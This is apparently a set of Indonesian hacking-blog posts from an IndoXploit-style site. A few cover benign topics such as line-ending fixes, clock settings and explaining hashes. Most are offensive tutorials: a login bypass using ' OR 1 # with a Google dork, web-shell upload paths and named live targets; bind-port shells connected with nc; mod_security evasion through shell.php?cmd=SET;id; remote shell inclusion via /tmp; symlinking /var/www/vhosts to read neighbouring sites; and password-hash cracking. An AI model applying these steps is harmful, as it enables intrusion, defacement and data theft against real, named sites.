Codes Xploit: belajar
Showing posts with label belajar. Show all posts
Showing posts with label belajar. Show all posts

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Memperbaiki Error "/bin/bash^M: bad interpreter" Pada Saat Menjalankan File Bash

 
Halo selamat pagi agan agan semua.
Sesuai judul, disini saya akan memberikan beberapa solusi jika terdapat error semacam /bin/bash^M: bad interpreter pada saat menjalankan file bash.


Error ini terjadi karena file terdapat line style ending "\r\n". Sebenarnya, pada linux line style ending yang benar adalah  "\n" saja, sedangkan "\r\n" terdapat pada DOS/Windows. Jadi jika kalian menjalankan file yang mengandung line style ending "\r\n" pada linux, maka sudah pasti akan terdapat error semacam itu. Untuk lebih jelasnya, coba kalian run file bash kalian seperti ini:

user@linux $ bash file.sh
atau
user@linux $ sh file.sh

Kalian akan mendapati error seperti ini:


Beberapa cara yang dapat kalian lakukan untuk memperbaiki ini adalah sebagai berikut.

  • Menggunakan command tr
user@linux $ tr -d "\r" < file.sh > file_fix.sh && rm -rf file.sh
Nantinya file.sh akan dibersikan (dihapus \r), lalu di write ke dalam file baru bernama file_fix.sh yang nantinya inilah file yang akan kalian jalankan.
user@linux $ ./file_fix.sh

  • Menggunakan command sed
user@linux $ sed -i -e "s/\r$//" file.sh

  • Menggunakan command dos2unix
user@linux $ dos2unix file.sh
Jika dos2unix belum ada pada linux kalian, installah terlebih dahulu. Kalian bisa cari referensi untuk menginstall dos2unix pada linux kalian masing-masing di google.


Oke sekian dulu, itu adalah beberapa cara yang bisa kalian lakukan untuk memperbaiki error dari /bin/bash^M: bad interpreter. 

Semoga bermanfaat .

Tutorial Socket Server with Perl

 
Halo, selamat malam. Kali ini gua mau sharing lagi gimana socket server.
Masih inget gimana kemarin Meme Comic Indonesia (MCI) kena deface di PORT 1337?
Yap, gua pake metode ini.



Oke langsung aja.
Sebelumnya untuk melakukan socket server, kalian harus terlebih dahulu masuk ke dalam server target kalian lewat backdoor yang kalian pasang di salah satu website.


Disini saya menggunakan Script Perl yang saya dapat dari referensi google, lalu sedikit saya modifikasi agar koneksinya selalu open.

Script: https://pastebin.com/zk8v8jp6

Upload script socket perl diatas tadi ke backdoor kalian.
Setelah di upload, jalankan command berikut untuk menjalankan file perlnya.
$ perl perlcgi.pl
 [perlcgi.pl] adalah nama file kalian.

Metode ini akan membuka koneksi pada port yang sudah ditentukan.
 Setelah itu, lalu jalankan command berikut untuk memastikan.
$ ps aux | grep 'perl'

Saya menamai file perlnya dengan nama  'percgi.pl', maka akan menghasilkan seperti di gambar (perl [namafile].pl)

Setelah itu, coba kita buka [IP:PORT] pada browser kita untuk memastikan lagi. Apakah koneksinya berhasil?

PORT yang saya buka adalah port 1337.



Yap Berhasil!!!.

Sekarang, kita Reverse IP tersebut dan lihat ada berapa banyak domain dalam IP yang sama.

Disini saya menggunakan
www.yougetsignal.com/tools/web-sites-on-web-server/


Coba salah satu website yang muncul disana dan tambahkan port 1337, karena di script tersebut saya set port 1337.


Dan lainnya pun sama.
---------------------------------------------------
--------------------------------------------------------


Oke sekian dulu yoooooo ~

Tutorial Reverse Shell Dengan Bind Port

 
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..


Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.


Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Memperbaiki Format Waktu Yang Salah Saat Dual Boot Pada Ubuntu

 
Halo, selamat malam.
Kemarin ada yang sempet nanya di grup facebook indoxploit tentang penunjukkan waktu yang salah pada Linux nya dan dia bilang ini karena abis boot ke Windows. Lalu tiba-tiba jam pada linuxnya error/salah. Oke, baru kemarin aja gua juga ngalamin hal yang sama. Kebetulan gua abis install Windows 7, dan dual boot dengan Linux Mint yang sampe sekarang saya gunakan.

Oke langsung saja, untuk memperbaiki error itu bisa dilakukan seperti ini:

Kemarin saya coba untuk set Local Time, saya menggunakan command 'timedatectl'

Dan, silakan liat hasilnya. Waktu pada Linux nya kemarin normal lagi.


Oke Sekian dulu.
Semoga bermanfaat.


Sumber:
https://askubuntu.com/questions/800914/clock-shows-wrong-time-after-switching-from-ubuntu-to-windows-10

Cara Mudah Hindari Serangan SQL Injection & Penggunaan SQLMAP oleh Attacker

 
Sesuai judul, kali ini gua akan share trik sederhana bagi kalian yang tak ingin websitenya di ubek-ubek oleh tools SQLmap. Ya, SQLmap merupakan sebuah tools yang sangat familiar dikalangan injector/attacker yang suka bermain-main dengan bug-bug SQL. Karena dinilai sangat mudah digunakan dan juga powerfull. Kita jadi tidak usah meng-inject secara manual ke website tujuan kita yang memiliki kelemahan SQL Injection. Tools SQLmap ini sudah akan otomatis meng-injectnya.

Yap, ini dia trik sederhananya. SQLmap sendiri dalam proses meng-injetnya, mengirimkan sebuah request HTTP Header kepada website yang di tuju. Anda bisa melihatnya dengan menambahkan option -v [level] (Verbose) .

> python sqlmap.py -u "localhost/test.php?id=1" --current-os -v 6

Lihatlah hasilnya, Disini kita akan mem-block User-Agent SQLmap, agar pada saat tools ini berjalan akan menghasilkan response lain.

berikut merupakan script sederhana yang saya buat, semoga kalian paham.
(script ini akan mudah di injeksi oleh SQLmap)

(Lalu block user-agent milik SQLmap, seperti yang saya buat pada bagian atas.)

Dan lihatlah perbedaannya saat kita eksekusi kembali pada target yang sama, namun kali ini kita memblock User-Agent nya.
( hasilnya adalah 404 Not Found, sesuai dengan apa yang sudah kita set pada script block nya tadi )

**Cara diatas tadi adalah untuk menghindari serangan dari Tools SQLMAP.
**Untuk Menghindari dari Serangan SQL Injection. Kalian tinggal memberikan beberapa fungsi seperti ini pada parameternya.

(gunakan fungsi mysqli_real_escape_string)

(hasilnya adalah seperti ini, tidak bisa di injeksi)

Oke sekian dulu , semoga bermanfaat .

Bypassing Blocked Linux Command by Mod_Security

 
Oke kali ini gua akan share tips tentang cara simple membypass command yang di blokir oleh mod_security. Pernah denger bukan?
Gambar terkait
ModSecurity merupakan
modul dari apache yang merupakan salah satu web server yang paling banyak
digunakan.
Kebanyakan serangan di internet dilakukan terhadap web untuk itu
diperlukan pengamanan khusus untuk menangani hal tersebut. Berbagai 
macam cara dapat dilakukan salah satunya adalah memasang WAF (Web
Application Firewall) salah satu WAF yang dibahas pada artikel ini
adalah ModSecurity.
ModSecurity merupakan web application firewall, Seperti firewall pada
umumnya yaitu melakukan filter data masuk dan keluar dan dapat untuk
menstop traffic yang dianggap berbahaya sesuai dengan rule yang
ditetapkan.
Pada ModSecurity terdapat beberapa fitur seperti HTTP Traffic Logging 
yang memungkinkan ModSecurity dapat melakukan full logging pada
transaksi HTTP. Dan juga terdapat fitur Virtual Patching yang merupakan
sebuah metode untuk melakukan patch sebuah vulnerability sebuah web
application tanpa menyentuh web application tersebut dengan membuat rule
yang memblok request yang berbahaya.
ModSecurity merupakan WAF yang menyediakan proteksi yang harus disetting
dengan rule karena Metode pemblokiran dari request-request yang
berbahaya tergantung dari rule yang ditetapkan. Untuk membuat
ModSecurity lebih powerfull dan untuk memungkinkan pengguna mendapatkan
keuntungan penuh Trustwave's SpiderLabs membuat project OWASP
ModSecurity Core Rule Set (CRS). CRS memberikan perlindungan generik
dari vulnerabilities yang tidak dikenali pada aplikasi web.
Contohnya, pernah mendapatkan sebuah akses backdoor yang ternyata dalam server tersebut di proteksi oleh modul modSecurity ini?. Dan ketika saja mencoba menjalankan command shell seperti berikut, munculah sesuatu seperti pada gambar dibawah ini.
Yap, seperti itulah hasilnya. Sewaktu kalian ingin menjalakan command linux pada command shell seperti command-command yang biasanya kita gunakan, yaitu:

- id
- uname
- pwd
- whoami

Tenang saja, jangan khawatir karena command-command tersebut masih bisa kita jalankan, tentu saja dengan cara membypassnya. Bagaimana caranya? mudah saja kalian cukup memanfaatkan command SET di Linux. Command SET itu sendiri merupakan command yang digunakan untuk mendefinisikan dan menentukan nilai dari system environtment (lingkungan sistem).

Oke, perhatikan gambar berikut.

Untuk menjalankan command yang di blokir oleh mod_security, cukup tambahkan command SET di depannya. serta pisahkan dengan ";" (tanpa kutip).

contohnya: shell.php?cmd=SET;id

lihat bukan? command yang tadinya akan menghasilkan "Not Acceptable" akan berjalan dengan baik.

Kalian juga dapat membypassnya dengan cara seperti ini:

- shell.php?cmd=SET;id ->shell.php?cmd=set $(id);set
- shell.php?cmd=SET;whoami -> setshell.php?cmd=set $(whoami);set
- shell.php?cmd=set $(uname -r);set

untuk yang menggukana command seperti ?cmd=set $(command);set, anda bisa melihat hasilnya di paling bawah.
(yap ini dia hasilnya ?cmd=set $(uname -rv);set , 3.12.65-188.ELK6.x86_64. Terdapat pada _=)

dan lainnya, kalian juga bisa menggunakan cara ini:

- shell.php?cmd=***;id
- shell.php?cmd=***;whoami

Dimana shell.php merupakan command shell milik kalian, silakan kalian kembangkan.
Oke sekian dulu kawan, semoga menambah wawasan.

Bypass Blocked User-Agent with cURL [ CLI ]

 
Halooo, selamat malam. Sesuai judul, kali ini gua akan sedikit membahas tentang bagaimana memanfaatkan sebuah code untuk memblock beberapa User-Agent dan juga pastinya Cara Bypass hal tersebut. Oke Langsung saja.

Pertama, pernahkan kalian membuat sebuah sedikit potongan kode untuk memblock adanya user-agent" yang dianggap sebagai bot? agar tidak bisa mendeteksi situs anda.
Contohnya seperti potongan kode PHP berikut.

Kode diatas dimaksudkan untuk memblokir adanya user-agent bot yang termasuk kedalam list $userAgent. Pada saat kita menggunakan "User-Agent" yang termasuk ke dalam list tersebut. Maka akan menghasilkan output header 404 Not Found. Seperti yang kita set pada script.

Akan gua buktikan seperti ini, gua akan memblockir user-agent curl, agar pada saat kita menggunakan curl untuk melihat website tersebut, maka akan menghasilkan header 404 Not Found.
Saya akan menambahkan list "curl" kedalam variable $userAgent.
(lihat di akhir)

Sekarang kita Coba, dengan menggunakan command curl pada CLI/CMD.
curl -v -k http://website.com/script.php

* -v = digunakan untuk memberikan output http header pada screen (Verbose)
* -k = mengizinkan koneksi ke situs SSL tanpa sertifikat
(terlihat pada gambar, bahwa hasil curl mendapatkan bahwa situs yang di maksud mempunya hasil 404 Not Found [ Halaman tidak ditemukan ], padahal ketika kita buka di browser dapat kita akses)

Nah, Bagaimana jika kita tidak mempunyai hak untuk mengedit file yang memblokir user-agent tersebut? sudah pasti ketika kita ingin membuat sebuah scanner/finder contohnya, hal ini akan sulit. malah kita akan bisa di bodohi oleh hasilnya, yang ternyata dapat diakses malah ternyata tools buatan kita menghasilkan sesuatu yang berbeda dari yang kita inginkan. 

Nah, tenang saja hal ini dapat kita bypass. Bagaimana caranya? Caranya adalah kita ganti HTTP Request User-Agentnya, menjadi user-agent yang tidak terdapat kedalam list (blacklist) script tadi.

Anda bisa gunakan cara yang sama yaitu curl (CLI/CMD) atau bisa juga dengan script biasa. Tambahkan Opsi -H pada curl nya, untuk mengirimkan request HTTP.

curl -v -k -H "User-Agent: Deepweb" http://website.com/script.php
(terlihat beda bukan? kita berhasil membypassnya. lihat bahwa dengan kita menambahkan -H User-Agent pada HTTP Requestnya dan menggantinya dengan User-Agent Lain.(not blacklisted) . Hasilnya menunjukkan 200 OK. [halaman dapat diakses] )

Paham? Mudah Bukan :D


Oke Sekian dulu, semoga bermanfaat :D

WordPress HASH Decrypter Tools

 
Okee, selamat sore kawan. Kemarin gua share sedikit tips sederhana bagaimana mendecrypt  sebuah hash hasil fungsi cyrpt dan password_hash pada PHP. Contohnya adalah seperti ini $1$bcl63GxF$FkUtrx6OxdSusl6aTLnYR . Kalian bisa cek artikelnya disini http://www.indoxploit.or.id/2017/03/simple-way-to-decrypt-hash-from-crypt.html.

Oke, kali ini gua akan membahas hal yang sama yaitu mendecrypt hash lagi. Tapi jenis hash apa kali ini?

Karena banyaknya orang yang merequest dan bingung bagaimana memecahkan hash dari CMS WordPress. Kali ini akan gua share tips sederhananya :D

CMS WordPress merupakan salah satu cms yang menggunakan proses hashing yang rumit dalam mengamankan passwordnya. Tidak seperti CMS lain yang rata-rata masih memakai MD5/SHA1.

Oke tidak usah banyak bicara, kita langsung masuk ke pembahasan saja.

( Jalankan di Terminal/CMD [ CLI Based ] )

Kalian lihat bagian ini:
[+]$P$Bd2v1uNoAchuGhnGiwFdS52wmk5.8X0 -> indoxploit (OK)

itu tandanya Hash tersebut sesuai dengan kata 'indoxploit'

Kalian Bisa Mendapatkan Tools ini di Github.

Atau bisa Mendownloadnya:
git clone https://github.com/agussetyar/wpdecrypt.git


Oke sekian dulu, semoga bermanfaat :D

Simple Way to Decrypt HASH from Crypt, password_hash Function Using Dictionary Attack

 
Haloooo, selamat malam semua. Dalam kesempatan kali ini gua akan sedikit share trik sederhana/mudah untuk men-decrypt sebuah hash dari fungsi crypt dan password_hash

Sebelumnya, apakah kalian pernah melihat hash seperti ini sebelumnya??
$1$FHBWvpjf$ldIqxhnMjPVoJgScwiDp1/
- $2y$10$BxO1iVD3HYjVO83NJ58VgeM4wNc7gd3gpggEV8OoHzB1dOCThBpb6
- $2y$10$dEuDeZsaw2QVJqERAjivtu2/FttjoW2KLHdZWsDfBR.ZYxCJFH9ha

Pernah kalian lihat?
Yap, itu merupakan hasil hashing dari fungsi crypt dan password_hash

Nah, dalam artikel kali ini. Saya akan memberikan tips sederhana bagaimana mendecrypt hash tersebut. Walaupun tidak pasti 100% berhasil, tapi setidaknya ini akan sedikit membantu.

Script: http://pastebin.com/Sn19ShVX

Cara Pakainya:
(Jalankan di Terminal/CMD [CLI Based] )

Di gambar tersebut kalian melihat bagian:
[+] $2y$10$BxO1iVD3HYjVO83NJ58VgeM4wNc7gd3gpggEV8OoHzB1dOCThBpb6 -> indoxploit (OK)

Itu tandanya, hash tersebut sesuai dengan kata 'indoxploit'

Kalian bisa mencobanya sendiri dengan membuat hash seperti diatas dengan fungsi crypt atau password_hash pada PHP . Dan kalian bisa mencoba tools decrypter simple ini untuk membuktikannya.
Proses nya tergantung dari berapa banyaknya wordlist kalian.

Oke sekian dulu tutorialnya, semoga bermanfaat.

Referensi:

Powered By Nusiorung - Bypassing Admin Login

 

Google Dork:  intext:"Powered By Nusiorung"

Login Dengan Username & Password
Username : ' OR 1 #
Password : ' OR 1 #




Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.



Setelah itu, klik kotak pada bagian bawah


Langsung upload shell kita disini



Jika Sudah, kalian akan melihat shell kalian seperti ini, di dalam list document tadi

( Yang dilingkari merah adalah nama file shell backdoor anda )


Selanjutnya, letak shell kalian ada di:
-> /admin/document/upload/shell.php

Contoh: http://target.com/admin/document/upload/YJE6ZH.php

Live Target: 
http://edu.nmc.ac.th/th/admin/


Oke, Sekian Dulu Tutorial nya, Silakan kalian kembangi lagi.

Tutorial Symlink dengan Command Linux

 
Okee, berhubung banyak yang request tentang tools "symlink" dengan shell indoxploit. Kebetulan belakangan ini gua lagi sibuk, jadi ya udah gua share teknik ini dulu yaa. nanti akan gua update di shell indoxploit. Oke Langsung aja ........

1. Buatlah sebuah folder untuk letak folder symlink nya (bebas nama foldernya)

(disini, foldernya gua namain "symlink")

2. Masuklah kedalam folder yang baru kita buat tadi, lalu buat lah sebuah file .htaccess dengan isi sebagai berikut: 


3. Masukkan Command Linux ini di dalam Command Shell yang tersedia dalam shell backdoor. (di shell indoxploit, fitur "command"). Eksekusi Command ini di dalam folder yang kita buat tadi.

ln -s /var/www/vhosts sym 

/var/www/vhosts -> ganti dengan folder yang ingin di symlink, (ex: /home, /root, /var, )
sym -> ini ada folder yang nantinya akan menampung semua isi dari symlink tersebut.

Fungsi symlink secara singkat dapat di artikan bahwa sebuah folder (/var/www/vhosts) akan di link kan ke dalam sebuah folder baru bernama "sym" yang tadi kita masukkan dalam command shell. Jadi nanti di dalam folder /sym , isinya merupakan seluruh folder di dalam /var/www/vhosts
4. Yap, jika sudah, langsung buka di url: (www.target.com/symlink/sym/)

symlink -> merupakan nama folder yang kita buat di awal langkah tadi.
sym -> tempat menampung isi dari folder /var/www/vhosts



Dan terakhir, buka salah satu folder yang tertera disana , contohnya:
www.target.com/symlink/sym/domain.com/ (cek ss )

(ups, ternyata forbidden)

Mari kita cek lagi
(lihat, ada folder "httpdocs" setelah nama domainnya)

Folder "httpdocs" merupakan document_root dari web tersebut.

Okee, jadi kita buka begini:
www.target.com/symlink/sym/domain.com/httpdocs/


Oke, simple bukan? 
Silakan berkarya lagi, heheheheheh

Mengenal tentang Enkripsi, Hash, dan Encode

 
Hallooo, selamat malam kawan. Sesuai judul, kali ini saya akan membahas tentang "Apa itu Enkripsi, Hash, dan Encode?". Apa mereka semua ber-arti sama? atau bagaimana yaaa...........


Oke, artikel ini gua buat untuk membantu kawan-kawan semua yang bingung untuk mengenalis jenis-jenis hash password yang biasanya kita temukan saat kita men-dump sebuah data hasil "SQL Injection" ataupun menjelajahi isi dari databasenya sebuah website. Tentu saja, seiring berkembangannya dan Majunya teknologi, Semua data yang bersifat sensitif ataupun data rahasia/privasi yang seharusnya dilindungi pasti tidak mudah untuk mendapatkannya begitu saja. Walaupun sudah kita dapatkan, namun pastinya data itu di enkripsi dengan bahasa-bahasa/tulisan aneh yang sebelumnya tidak kita kenali jenis apa ini.

Oke mari kita ke pokok bahasan.
Hash berkaitan erat dengan Enkripsi. Tentunya Hash dan Enkripsi memiliki pengertian berbeda. Mari kita simak.

Apakah sebenarnya yang dimaksud Hash itu Sendiri?
- Hash adalah hasil enkripsi dari sebuah password atau informasi yang dianggap penting.

Lalu, apa enkripsi itu?
- Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus ( http://id.wikipedia.org/wiki/Enkripsi ).

Ada beberapa tipe hash diantaranya:
1. MD4 (Message-Digest algortihm 4)
� MD4 dibuat oleh Ronald Rivest pada Oktober 1990, MD4 adalah hash function yang dipakai sebelum MD5, namun karena banyaknya kelemahan MD4 membuatnya diganti oleh MD5.
� panjang 16 bytes (32 karakter)
� contoh : 31d6cfe0d16ae931b73c59d7e0c089c0

2. MD5 (Message-Digest algortihm 5)
� MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (http://id.wikipedia.org/wiki/MD5)
� digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
� panjangnya 16 bytes (32 karakter)
� contoh : c4ca4238a0b923820dcc509a6f75849b

3. MD5($pass.$salt)
� Digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
� panjang 16 bytes (32 karakter)
� hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
� contoh : 6f04f0d75f6870858bae14ac0b6d9f73

4. MD5($salt.$pass)
� Digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
� panjang 16 bytes (32 karakter)
� hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
� contoh : f190ce9ac8445d249747cab7be43f7d

5. Md5(md5($pass).$salt)
� Digunakan di vBulletin, IceBB dan cms lainnya
� panjang 16 bytes (32 karakter)
� contoh : 6011527690eddca23580955c216b1fd2

6. MD5(WordPress)
� Digunakan di wordpress
� panjangnya 17 bytes (34 karakter)
� hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf �B�)
kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah �12345678?) lalu dilanjutkan oleh hashnya
� contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

7. MD5(phpBB3)
� Digunakan di CMS phpBB 3.x.x
� panjangnya 17 bytes (34 karakter)
� hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor �9?), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah �12345678?) kemudian dilanjutkan oleh hashnya
� contoh : $H$9123456785DAERgALpsri.D9z3ht120

8. SHA-1(Secure Hash Algorithm)
� Diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard digunakan oleh beberapa CMS dan beberapa forum
� panjangnya 20 bytes (40 karakter)
� contoh : 356a192b7913b04c54574d18c28d46e6395428ab

9. SHA-256(Secure Hash Algorithm)
� hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah �12345678?) lalu dilanjutkan oleh karakter �$� kemudian dilanjutkan oleh hashnya
� panjang 55 karakter
� contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi�

10. SHA-512(Secure Hash Algorithm)
� hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah �12345678?) lalu dilanjutkan oleh karakter �$� kemudian dilanjutkan oleh hashnya
� panjang 98 karakter
� contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm�
Berikut adalah contoh dari sekian banyaknya HASH, dalam prosesnya HASH merupakan "One Way Hash" / Hash satu arah, jika sebuah plain-text atau text biasa sudah di Hash, maka untuk mengembalikannya, kita tidak bisa menggunakan sebuah fungsi. Jadi saat sebuah data sudah di Hash, maka hasil plain-text nya tidak dapat kita kembalikan, kecuali kita "Sendiri" tau, data apa yang di hash tadi.

Lalu Bagaimana sebuah website seperti (www.hashkiller.co.uk) bisa men-decrypt / memecahkan Hasil Hash MD5/lainnya, menjadi plain-text biasa?
Website penyedia decrypter online, memiliki sebuah database hasil Hash didalamnya, artinya. Ketika kita menginputkan sebuah Password Hash MD5, website ini nantinya akan mencocokan data apa yang sesuai dengan Hash tadi. Jika datanya cocok, maka akan di informasikan melalui Ouput, bahwa HASH xxxxx, berisi text "ANU". Data ini sudah disiapkan dalam database website penyedia decrypter Online tersebut.

Bisa Melalui cara "Brute Force" namun akan sangat lama, bahkan berhari-hari, untuk mencocokannya.

Oke Selanjutnya, kita ke "Encode".
Apa itu Encode?
- Encode tidak termasuk kedalam Hash ataupun Enkripsi.
- Encode merupakan suatu Perkara perubahan format / bentuk data. Tujuannya pun sama, mengubah sebuah plain-text biasa, menjadi rangkain code (bahasa aneh).

Yang membedakan Hash dengan Encode adalah dalam prosesnya, Sebuah Text yang ter-Encode, bisa dapat kita kembalikan lagi seperti semua dengan sebuah fungsi tertentu dalam setiap bahasa pemrograman. Contohnya:

Text: Agus Setya R
Base64: QWd1cyBTZXR5YSBS -> (Encode dengan fungsi php , base64_encode("Agus Setya R") )
Base64: aW5kb3hwbG9pdA==
Text: indoxploit -> (Decode dengan fungsi php, base64_decode("aW5kb3hwbG9pdA==") )

Artinya, sebuah Encode dapat kita kembalikan (decode) menggunakan sebuah fungsi bahasa program yang telah disediakan. Beda dengan Hash yang tidak dapat dikembalikan seperti semula menggunakan fungsi.

Berikut merupakan contoh dari Encode (link menuju kepada PHP Function):
1. base32
2. base64
3. str_rot13
4. gzdeflate
Untuk Encode dan Decode anda dapat mempelajarinya sendiri, karena pada masing-masing bahasa program penulisan fungsi dari encode dan decodenya berbeda-beda. Namun, hasilnya akan tetap sama.

Tambahan: https://drive.google.com/file/d/0B8QQwW_htu38ckUxUkNWQlJmWU0/view (Hash Algorithm Linux Password), bagi kalian yang ingin tau dan mengenal bagaimana linux men-Hash password kita.

Oke , sekian dulu bahasan dari saya.
Semoga menambah ilmu, dan yang pasti jangan malas untuk membaca :D, Ilmu itu mahal kawan hahaha, selagi ada manfaatkan lah yang gratis....

Artikel ini diolah dari sumber: http://www.binushacker.net/tipe-tipe-hash-enkripsi.htmlLalu selebihnya, kita kembangankan agar menarik di baca....

Apa itu Deface?

 
Dalam artikel kali ini saya akan menjelaskan pengertian tentang deface,dan hal-hal apa saja yang diperlukan pada saat pertama kali belajar deface. Banyak sekali orang yang ingin mempelajari tentang deface/defacing, namun beberapa orang yang mementingkan hasil dari defacing tersebut yaitu berupa peretasan-peretasan website yang bertujuan mengganti halawan awal website dengan file yang sudah kita siapkan sebelumnya atau biasa disebut dengan Script Deface.
Yukk, kita cari tau apa sih deface itu dan apa saja yang perlu dipelajari.



Pengertian:

Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau di file).
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.
Pelaku peretasan deface sendiri dikenal dengan sebutan Defacer.

Jenis-Jenis:

a. Full of page
Artinya mendeface satu halaman penuh tampilan depan alias file index atau file lainnya yang akan diubah secara utuh, artinya untuk melakukan ini biasanya seorang �defacer� umumnya harus berhubungan secara �langsung� dengan box (mesin) atau usaha mendapatkan priveleged terhadap mesin, baik itu root account atau sebagainya yang memungkinkan defacer dapat secara Interaktif mengendalikan file indek dan lainnya secara utuh.

b. Sebagian atau hanya menambahi
